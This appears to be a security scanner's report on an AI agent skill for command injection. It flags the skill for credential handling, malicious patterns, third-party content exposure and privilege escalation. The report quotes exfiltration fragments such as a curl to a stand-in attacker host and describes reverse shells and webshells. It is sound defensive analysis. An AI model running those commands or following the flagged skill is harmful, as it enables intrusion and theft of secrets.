command-injection-methodology

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 1.00). Insecure — the skill explicitly instructs reading secret files/flags and embedding their contents verbatim in payloads, HTTP callbacks, and interactive outputs (e.g., echo "$(cat /flag.txt)", curl http://attacker/?d=$(cmd|base64), interactive_session read), which requires the LLM/agent to handle and relay secret values directly.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This is an explicit offensive playbook: it provides step‑by‑step command injection exploitation techniques (RCE), data exfiltration methods, webshell deployment, reverse shells and persistence mechanisms—clearly intended to enable unauthorized compromise and theft of sensitive data.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill explicitly instructs the agent to send HTTP requests to external targets (e.g., SKILL.md Phase 2 using response_diff and payloads, AGENT.md/tool preferences listing http_request and curl, and the evals scenario describing /api/ping?host= interactions) and to read and parse those remote responses (including application output and source files) which are untrusted third-party content that directly influence subsequent exploit actions.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to perform command injection, write webshells, run reverse/interactive shells, use tmux/netcat listeners and to escalate privileges (su/sudo), all of which modify host state and enable compromising the machine.